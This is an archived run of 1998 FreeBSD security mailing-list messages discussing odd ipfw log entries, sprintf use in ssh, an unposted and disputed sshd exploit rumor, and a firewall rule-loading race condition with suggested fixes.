mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 3 22:19:36 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA27256 for freebsd-security-outgoing; Tue, 3 Nov 1998 22:19:36 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA27248 for ; Tue, 3 Nov 1998 22:19:33 -0800 (PST) (envelope-from archie@whistle.com) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id WAA22247; Tue, 3 Nov 1998 22:19:25 -0800 (PST) Received: from bubba.whistle.com(207.76.205.7) by whistle.com via smap (V1.3) id sma022245; Tue Nov 3 22:18:55 1998 Received: (from archie@localhost) by bubba.whistle.com (8.8.7/8.6.12) id WAA20681; Tue, 3 Nov 1998 22:18:55 -0800 (PST) From: Archie Cobbs Message-Id: <199811040618.WAA20681@bubba.whistle.com> Subject: Re: Is it an attack? Strange things logged by ipfw. In-Reply-To: <363EBD86.74C9F6E2@sovlink.ru> from Alla Bezroutchko at "Nov 3, 98 11:23:34 am" To: alla@sovlink.ru (Alla Bezroutchko) Date: Tue, 3 Nov 1998 22:18:55 -0800 (PST) Cc: security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Alla Bezroutchko writes: > I have an ipfw-based firewall and noticed a peculiar connections in its > logs. Maybe this is some new kind of attack? Any comments appreciated. > Here are the logs: > > Nov 3 00:44:53 buddy /kernel: ipfw: 65534 Deny TCP a.b.c.d:50818 > aaa.aaa.aaa.aaa:1333 in via ex0 > Nov 3 01:12:51 buddy /kernel: ipfw: 65534 Deny TCP e.f.g.h:50818 > aaa.aaa.aaa.aaa:1565 in via ex0 > Nov 2 11:15:37 buddy /kernel: ipfw: 65534 Deny TCP i.j.k.l:50818 > aaa.aaa.aaa.aaa:1725 in via ex0 > Oct 20 04:20:03 buddy /kernel: ipfw: 65534 Deny TCP m.n.o.p:50818 > aaa.aaa.aaa.aaa:2349 in via ex0 > Oct 20 09:22:35 buddy /kernel: ipfw: 65534 Deny TCP q.r.s.t:50818 > aaa.aaa.aaa.aaa:1493 in via ex0 > Oct 19 04:35:01 buddy /kernel: ipfw: 65534 Deny TCP u.v.w.x:50818 > aaa.aaa.aaa.aaa:2465 in via ex0 One lesson I've learned over the years: never rule out broken Windows machines :-) -Archie ___________________________________________________________________________ Archie Cobbs * Whistle Communications, Inc. * http://www.whistle.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 3 23:11:27 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA04891 for freebsd-security-outgoing; Tue, 3 Nov 1998 23:11:27 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (p14-max11.wlg.ihug.co.nz [209.78.48.14]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA04881 for ; Tue, 3 Nov 1998 23:11:23 -0800 (PST) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.8/8.8.7) with SMTP id UAA05299; Wed, 4 Nov 1998 20:10:15 +1300 (NZDT) (envelope-from andrew@squiz.co.nz) Date: Wed, 4 Nov 1998 20:10:00 +1300 (NZDT) From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: Nicholas Charles Brawn cc: Warner Losh , FreeBSD-security@FreeBSD.ORG Subject: Re: [rootshell] Security Bulletin #25 (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Nov 1998, Nicholas Charles Brawn wrote: > Well I just grabbed 1.2.26 and did: > find . -exec grep sprintf {} \; |wc -l > > And came up with 138 lines. Just having sprintf() in your code is not > indicative of a vulnerability, but it's still a high number. ssh is commonly used for piping substantial ammounts of data, and can probably claim good reasons for using the faster non-bounds-checking routines in many of these cases. Doesn't apply to low volume things like the logging routines though. Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 01:45:13 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA25264 for freebsd-security-outgoing; Wed, 4 Nov 1998 01:45:13 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ol.kyrnet.kg (ol.kyrnet.kg [195.254.160.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA25220 for ; Wed, 4 Nov 1998 01:44:50 -0800 (PST) (envelope-from mlists@gizmo.kyrnet.kg) Received: from gizmo.kyrnet.kg ([192.168.1.125]) by ol.kyrnet.kg (8.9.1a/8.9.1) with ESMTP id OAA07236; Wed, 4 Nov 1998 14:14:18 +0600 Received: from localhost (mlists@localhost) by gizmo.kyrnet.kg (8.9.1a/8.9.1) with SMTP id OAA18547; Wed, 4 Nov 1998 14:42:36 +0500 (KGT) Date: Wed, 4 Nov 1998 14:42:36 +0500 (KGT) From: CyberPsychotic Reply-To: fygrave@tigerteam.net To: Alla Bezroutchko cc: security@FreeBSD.ORG Subject: Re: Is it an attack? Strange things logged by ipfw. In-Reply-To: <363EBD86.74C9F6E2@sovlink.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ~ ~ Nov 3 00:44:53 buddy /kernel: ipfw: 65534 Deny TCP a.b.c.d:50818 ~ aaa.aaa.aaa.aaa:1333 in via ex0 ~ Nov 3 01:12:51 buddy /kernel: ipfw: 65534 Deny TCP e.f.g.h:50818 ~ aaa.aaa.aaa.aaa:1565 in via ex0 ~ Nov 2 11:15:37 buddy /kernel: ipfw: 65534 Deny TCP i.j.k.l:50818 ~ aaa.aaa.aaa.aaa:1725 in via ex0 ~ Oct 20 04:20:03 buddy /kernel: ipfw: 65534 Deny TCP m.n.o.p:50818 [snip snip] ~ ~ What stumbles me is why they all use the same source port. nothing special. You could bing locally any port you want. It doesn't seem like a probing either, since these ports aint registered among reserved port numbers. could be kind of troyan probin'.. yeah, but hardly.. troyans love to use 31337 ports :-)). as someone already mentioned: Nothing will help brain-damaged windoze machines. :) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 02:07:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA28148 for freebsd-security-outgoing; Wed, 4 Nov 1998 02:07:25 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from buddy.sovlink.ru (buddy.sovlink.ru [194.186.12.9]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA28121 for ; Wed, 4 Nov 1998 02:07:12 -0800 (PST) (envelope-from alla@sovlink.ru) Received: from sovlink.ru (punk.sovlink.ru [194.186.12.133]) by buddy.sovlink.ru (8.9.1/8.9.1) with ESMTP id NAA02092 for ; Wed, 4 Nov 1998 13:10:57 +0300 (MSK) Message-ID: <3640275A.C3D01E5C@sovlink.ru> Date: Wed, 04 Nov 1998 13:07:22 +0300 From: Alla Bezroutchko X-Mailer: Mozilla 4.5 [en] (WinNT; I) X-Accept-Language: ru,en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Re: Is it an attack? Strange things logged by ipfw - more on that References: Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org CyberPsychotic wrote: > ~ Nov 3 00:44:53 buddy /kernel: ipfw: 65534 Deny TCP a.b.c.d:50818 > ~ aaa.aaa.aaa.aaa:1333 in via ex0 > ~ Nov 3 01:12:51 buddy /kernel: ipfw: 65534 Deny TCP e.f.g.h:50818 > ~ aaa.aaa.aaa.aaa:1565 in via ex0 > ~ Nov 2 11:15:37 buddy /kernel: ipfw: 65534 Deny TCP i.j.k.l:50818 > ~ aaa.aaa.aaa.aaa:1725 in via ex0 > ~ Oct 20 04:20:03 buddy /kernel: ipfw: 65534 Deny TCP m.n.o.p:50818 Some recent investigations showed even more interesting things. There were connection attempts to three different IPs. One as mentioned, doesn't belong to anything, other is a '95 box and the third one is an HP printer. Every destination address corresponds to a source port. Source IPs are different but some used twice or thrice. Source ports used: 50818, 20330, 26157. This is logged since October 5th (maybe it started earlier, I kept logs only for a month) till yesterday, sometimes one probe in two or three days, sometimes four probes a day. > Nothing will help brain-damaged windoze machines. :) Checked. Some of source IPs belong to 'doze machines, some don't. Brain damaged unix? ;) Ideas? Alla. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 05:11:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA19522 for freebsd-security-outgoing; Wed, 4 Nov 1998 05:11:53 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (p8-max3.wlg.ihug.co.nz [209.79.142.72]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA19516 for ; Wed, 4 Nov 1998 05:11:48 -0800 (PST) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.8/8.8.7) with SMTP id CAA08282; Thu, 5 Nov 1998 02:11:07 +1300 (NZDT) (envelope-from andrew@squiz.co.nz) Date: Thu, 5 Nov 1998 02:11:06 +1300 (NZDT) From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: Alla Bezroutchko cc: security@FreeBSD.ORG Subject: Re: Is it an attack? Strange things logged by ipfw - more on that In-Reply-To: <3640275A.C3D01E5C@sovlink.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Nov 1998, Alla Bezroutchko wrote: > > Nothing will help brain-damaged windoze machines. :) > > Checked. Some of source IPs belong to 'doze machines, some don't. > Brain damaged unix? ;) Have you talked to the owners of any of the machines? Are they related in any way? I had a whole lot of seemingly unrelated packets a while back that turned out to be due to a faulty router at a major ISP in the UK. It seems that the router was splitting the tcp headers from their bodies, and under heavy load was putting some of them back together wrong so that I got packets from unrelated sessions. The ISP serviced many domains so it took me a while to realize that it was coming from the one place. Traceroute is helpful for that. Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 05:26:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA21909 for freebsd-security-outgoing; Wed, 4 Nov 1998 05:26:02 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from heidegger.uol.com.br (heidegger.uol.com.br [200.230.198.88]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA21619 for ; Wed, 4 Nov 1998 05:25:44 -0800 (PST) (envelope-from agora@agoractvm.com.br) Received: from agoractvm.com.br (rjo-1-as01-7-a28.gd.uol.com.br [200.224.131.28]) by heidegger.uol.com.br (8.9.1/8.9.1) with ESMTP id LAA17040; Wed, 4 Nov 1998 11:26:57 -0200 (EDT) Message-ID: <364054DC.DF96B116@agoractvm.com.br> Date: Wed, 04 Nov 1998 11:21:32 -0200 From: =?iso-8859-1?Q?Teleinform=E1tica?= Reply-To: agora@uol.com.br Organization: =?iso-8859-1?Q?=C1GORA?= C.T.V.M. S/A X-Mailer: Mozilla 4.5 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: FreeBSD Security CC: Cristiano Colpani , Guilherme Galileo Cox , "Nilson R. A. de Brito" Subject: [Fwd: SSHD Exploit] Content-Type: multipart/mixed; boundary="------------0025AF466B75829A90012340" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. --------------0025AF466B75829A90012340 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit -- Regards, _______________________ | Nelson 'Stderr' Brito |_________________________________ |_________________________________________________________| |Finger Print: | A2E0 D90E 413A 515A 10C9 C0CE 4855 D523 | | E-mail: | nelson@cyberspace.org | | URL: | http://www.angelfire.com/sd/stderr | | Public key: | See the URL | |______________|__________________________________________| |ooooooooooooooooooooooooooooooooooooooooooooooooooooooooo| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ --------------0025AF466B75829A90012340 Content-Type: message/rfc822 Content-Transfer-Encoding: 7bit Content-Disposition: inline Received: by pascal (mbox agora) (with Cubic Circle's cucipop (v1.22 1998/04/11) Wed Nov 4 09:24:47 1998) X-From_: root Wed Nov 4 01:08:10 1998 Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) by pascal.uol.com.br (8.9.1/8.9.1) with ESMTP id BAA12002; Wed, 4 Nov 1998 01:08:03 -0200 (EDT) Received: from netspace.org ([128.148.157.6]:54856 "EHLO netspace.org" ident: "TIMEDOUT2") by brimstone.netspace.org with ESMTP id <77774-27536>; Tue, 3 Nov 1998 21:37:34 -0500 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with spool id 4569238 for BUGTRAQ@NETSPACE.ORG; Tue, 3 Nov 1998 21:30:42 -0500 Approved-By: aleph1@DFW.NET Received: from gti.net (apollo.gti.net [199.171.27.7]) by netspace.org (8.8.7/8.8.7) with ESMTP id RAA18872 for ; Sun, 1 Nov 1998 17:05:06 -0500 Received: from localhost (jfoutts@localhost) by gti.net (8.9.1/8.8.8) with ESMTP id RAA24814 for ; Sun, 1 Nov 1998 17:05:07 -0500 (EST) MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: Date: Sun, 1 Nov 1998 17:05:07 -0500 Reply-To: Justin Foutts Sender: Bugtraq List From: Justin Foutts Subject: SSHD Exploit To: BUGTRAQ@netspace.org X-Mozilla-Status2: 00000000 On a system I administer I found a program named sshdwarez.c in one of my user's home directories. Upon further inspection I found that this was the source code of an x86/Linux remote buffer overflow exploit for sshd versions 1.2.26 and below. I have tested this exploit on a number of my systems and have obtained remote root access on each one. I will not post this exploit as it could give crackers a tool to gain unauthorized access to systems. I STRONGLY recommend that everyone upgrade their versions of sshd as soon as possible. Thanks! Justin --------------0025AF466B75829A90012340-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 05:28:18 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA22617 for freebsd-security-outgoing; Wed, 4 Nov 1998 05:28:18 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.webspan.net (mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA22611 for ; Wed, 4 Nov 1998 05:28:16 -0800 (PST) (envelope-from opsys@mail.webspan.net) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with SMTP id IAA16942 for ; Wed, 4 Nov 1998 08:28:09 -0500 (EST) Date: Wed, 4 Nov 1998 08:28:08 -0500 (EST) From: Open Systems Networking X-Sender: opsys@orion.webspan.net To: freebsd-security@FreeBSD.ORG Subject: Amazing wonder packet sneaks by deny all rule? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It's really late/early this morning and I was just checking the rule set on a clients machine I just built. When I saw this: 65534 195 14104 deny log ip from any to any 65535 1 76 deny ip from any to any Now maybe it's my lack of sleep but how did that amazing wonder packet on rule 65535 sneak by 65534 :-) A fluke? A 1 in a million chance? A posessed packet? This isn't exactly the kind of thing that instills confidence in ones choice of firewall software :-) It's ipfw BTW if you cant tell from the syntax, not ipfilter. I have NEVER seen this happen before, so im guessing it's just a freak accident. But it is curious nonetheless. Chris -- "You both seem to be ignoring the fact that the networking market is driven by so-called 'IT professionals' these days, most of whom can't tell the difference between an ARP and a carp." --Wes Peters ===================================| Open Systems FreeBSD Consulting. FreeBSD 3.0 is available now! | Phone: (402)573-9124 / ICQ # 20016186 -----------------------------------| 3335 N. 103 Plaza, Omaha, NE 68134 FreeBSD: The power to serve! | E-Mail: opsys@open-systems.net http://www.freebsd.org | Consulting, Network Engineering, Security ===================================| http://open-systems.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 07:26:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA10603 for freebsd-security-outgoing; Wed, 4 Nov 1998 07:26:53 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA10598 for ; Wed, 4 Nov 1998 07:26:52 -0800 (PST) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id HAA05773; Wed, 4 Nov 1998 07:26:26 -0800 (PST) (envelope-from jkh@time.cdrom.com) To: agora@uol.com.br cc: FreeBSD Security , Cristiano Colpani , Guilherme Galileo Cox , "Nilson R. A. de Brito" Subject: Re: [Fwd: SSHD Exploit] In-reply-to: Your message of "Wed, 04 Nov 1998 11:21:32 -0200." <364054DC.DF96B116@agoractvm.com.br> Date: Wed, 04 Nov 1998 07:26:25 -0800 Message-ID: <5769.910193185@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Bah. *More* rumors without proof. "I will not post this exploit.." Sigh... - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 07:40:11 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA12455 for freebsd-security-outgoing; Wed, 4 Nov 1998 07:40:11 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from phoenix (phoenix.aye.net [206.185.8.134]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id HAA12445 for ; Wed, 4 Nov 1998 07:40:07 -0800 (PST) (envelope-from brich@aye.net) Received: (qmail 25203 invoked by uid 7506); 4 Nov 1998 15:31:54 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 4 Nov 1998 15:31:54 -0000 Date: Wed, 4 Nov 1998 10:31:54 -0500 (EST) From: Barrett Richardson To: spork cc: Andrew McNaughton , Warner Losh , bow , FreeBSD-security@FreeBSD.ORG Subject: Re: [rootshell] Security Bulletin #25 (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I also contacted him and urged him to release the code to the appropriate authorities, maybe he'll give in. I recently got the stackguard compiler http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/ up and going on my 2.2.7 box. I had high hopes that some definitive info of the SSH exploit would surface so I could test it against something real. - Barrett On Tue, 3 Nov 1998, spork wrote: > Sorry to bring this up again, but someone has posted on BugTraq stating > they found a copy of an exploit for sshd (remote root). He claims to have > tried it on his own machines with success. > > I know this could be entirely fake, but who really knows... > > I contacted him privately urging him to contact CERT, AUS-CERT, IBM-ERS, > etc. and provide the code to them. I also requested more info about his > OS and version, whether the patches that were supplied protected him, and > which auth methods are allowed in his sshd_config. > > Sorry to bring this up again, but I thought perhaps the paranoid might be > interested... > > Thanks, > > Charles > > --- > Charles Sprickman > spork@super-g.com > > On Tue, 3 Nov 1998, Andrew McNaughton wrote: > > > On Mon, 2 Nov 1998, Warner Losh wrote: > > > > > Just so everyone knows, this advisory was only a draft advisory and > > > was cancelled over the weekend. I saw the original advisory and > > > checked stuff in based on it, since generally changes like this are > > > good and can't hurt anything. After I checked in the fixes to ssh, I > > > discovered that it had been determined that there was no way of > > > exploiting this buffer call because all the places that called it had > > > bounds checking. > > > > I had a brief look over the ssh code some months ago. I didn't find > > anything exploitable, but I did find things that made me uncomfortable, > > like the logging routine that uses vsprintf (or something similarly > > lacking in bounds checking) and expected all the places it was checked to > > do the bounds checking. > > > > As far as I looked, they pretty much did, though in one place I noted that > > it was dependent on the length of a domain name returned from a reverse > > lookup. > > > > Andrew > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 08:12:05 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA16839 for freebsd-security-outgoing; Wed, 4 Nov 1998 08:12:05 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from rucus.ru.ac.za (rucus.ru.ac.za [146.231.29.2]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id IAA16677 for ; Wed, 4 Nov 1998 08:11:46 -0800 (PST) (envelope-from nbm@rucus.ru.ac.za) Received: (qmail 5101 invoked by uid 1003); 4 Nov 1998 16:11:22 -0000 Message-ID: <19981104181121.A4160@rucus.ru.ac.za> Date: Wed, 4 Nov 1998 18:11:21 +0200 From: Neil Blakey-Milner To: Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: Re: Amazing wonder packet sneaks by deny all rule? References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Open Systems Networking on Wed, Nov 04, 1998 at 08:28:08AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed 1998-11-04 (08:28), Open Systems Networking wrote: > It's really late/early this morning and I was just checking the rule set > on a clients machine I just built. When I saw this: > > 65534 195 14104 deny log ip from any to any > 65535 1 76 deny ip from any to any > > Now maybe it's my lack of sleep but how did that amazing wonder packet > on rule 65535 sneak by 65534 :-) A fluke? A 1 in a million chance? I think the packet is likely to have arrived after firewalling kicked in, and before you added your 65534 rule. Neil -- Neil Blakey-Milner nbm@rucus.ru.ac.za To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 08:42:05 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA20315 for freebsd-security-outgoing; Wed, 4 Nov 1998 08:42:05 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fledge.watson.org (COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA20307 for ; Wed, 4 Nov 1998 08:42:01 -0800 (PST) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id LAA29436; Wed, 4 Nov 1998 11:41:33 -0500 (EST) Date: Wed, 4 Nov 1998 11:41:32 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Open Systems Networking cc: freebsd-security@FreeBSD.ORG Subject: Re: Amazing wonder packet sneaks by deny all rule? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by hub.freebsd.org id IAA20309 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Nov 1998, Open Systems Networking wrote: > It's really late/early this morning and I was just checking the rule set > on a clients machine I just built. When I saw this: > > 65534 195 14104 deny log ip from any to any > 65535 1 76 deny ip from any to any > > Now maybe it's my lack of sleep but how did that amazing wonder packet > on rule 65535 sneak by 65534 :-) A fluke? A 1 in a million chance? > A posessed packet? This isn't exactly the kind of thing that instills > confidence in ones choice of firewall software :-) > It's ipfw BTW if you cant tell from the syntax, not ipfilter. > I have NEVER seen this happen before, so im guessing it's just a freak > accident. But it is curious nonetheless. Chris, My guess it is a race condition. The packet arrived between when your network interface went up, and the ruleset was added. Because your default policy is deny, it worked fine. However, this does actually bring interesting risks to mind: as long as the rules are added in numeric order, and the default policy is deny, you should always get consistent (if overly draconian) policy during bootup. However, if you have your ipfw lines not in the rule order, then some allows might be installed in the list of rules *before* the denies that precede them. In this situation, the race condition would allow a packet in that should not have been allowed in. The whole effect is because the installation of ipfw rules is non-atomic. I wondered for a while about the same thing on some of my systems. It would be nice if it were possible to set up the rules, then 'apply' them atomically. I suspect that this is really the equivilent of ifconfig down before ipfw, then ifconfig up at the end. I seem to recall at one stage there were some bugs in the up/down behavior of some network drivers, but that was years and years ago (I hope). Perhaps a better solution is to either a) always order ipfw rule addition, or b) insert a rule '1' that denies all packets, install the rest of the rules, then remove this rule '1' when the rest of the rules modifying the policy are in place. While the current behavior is perfectly consistent, it might catch new users by surprise, as it is a non-obvious source of vulnerability. Robert N Watson Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org http://www.watson.org/~robert/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 09:20:49 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA26989 for freebsd-security-outgoing; Wed, 4 Nov 1998 09:20:49 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id JAA26980 for ; Wed, 4 Nov 1998 09:20:46 -0800 (PST) (envelope-from imp@village.org) Received: from harmony [10.0.0.6] by rover.village.org with esmtp (Exim 1.71 #1) id 0zb6bU-0003zf-00; Wed, 4 Nov 1998 10:20:20 -0700 Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.1/8.8.3) with ESMTP id KAA00555; Wed, 4 Nov 1998 10:20:22 -0700 (MST) Message-Id: <199811041720.KAA00555@harmony.village.org> To: Barrett Richardson Subject: Re: [rootshell] Security Bulletin #25 (fwd) Cc: spork , Andrew McNaughton , bow , FreeBSD-security@FreeBSD.ORG In-reply-to: Your message of "Wed, 04 Nov 1998 10:31:54 EST." References: Date: Wed, 04 Nov 1998 10:20:22 -0700 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Barrett Richardson writes: : I recently got the stackguard compiler : http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/ : up and going on my 2.2.7 box. I had high hopes that some definitive : info of the SSH exploit would surface so I could test it against : something real. StackGuard only supports Linux/elf on intel right now. However, it wouldn't be too hard to add FreeBSD elf to this list. FreeBSD aout would be much harder... Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 09:24:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA27648 for freebsd-security-outgoing; Wed, 4 Nov 1998 09:24:04 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from Kitten.mcs.com (Kitten.mcs.com [192.160.127.90]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA27570 for ; Wed, 4 Nov 1998 09:24:01 -0800 (PST) (envelope-from nash@Mars.mcs.net) Received: from Mars.mcs.net (nash@Mars.mcs.net [192.160.127.85]) by Kitten.mcs.com (8.8.7/8.8.2) with ESMTP id LAA20364; Wed, 4 Nov 1998 11:23:52 -0600 (CST) Received: (from nash@localhost) by Mars.mcs.net (8.8.7/8.8.2) id LAA06071; Wed, 4 Nov 1998 11:23:52 -0600 (CST) Message-ID: <19981104112352.B4776@mcs.net> Date: Wed, 4 Nov 1998 11:23:52 -0600 From: Alex Nash To: Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: Re: Amazing wonder packet sneaks by deny all rule? Mail-Followup-To: Open Systems Networking , freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Open Systems Networking on Wed, Nov 04, 1998 at 08:28:08AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 04, 1998 at 08:28:08AM -0500, Open Systems Networking wrote: > > It's really late/early this morning and I was just checking the rule set > on a clients machine I just built. When I saw this: > > 65534 195 14104 deny log ip from any to any > 65535 1 76 deny ip from any to any > > Now maybe it's my lack of sleep but how did that amazing wonder 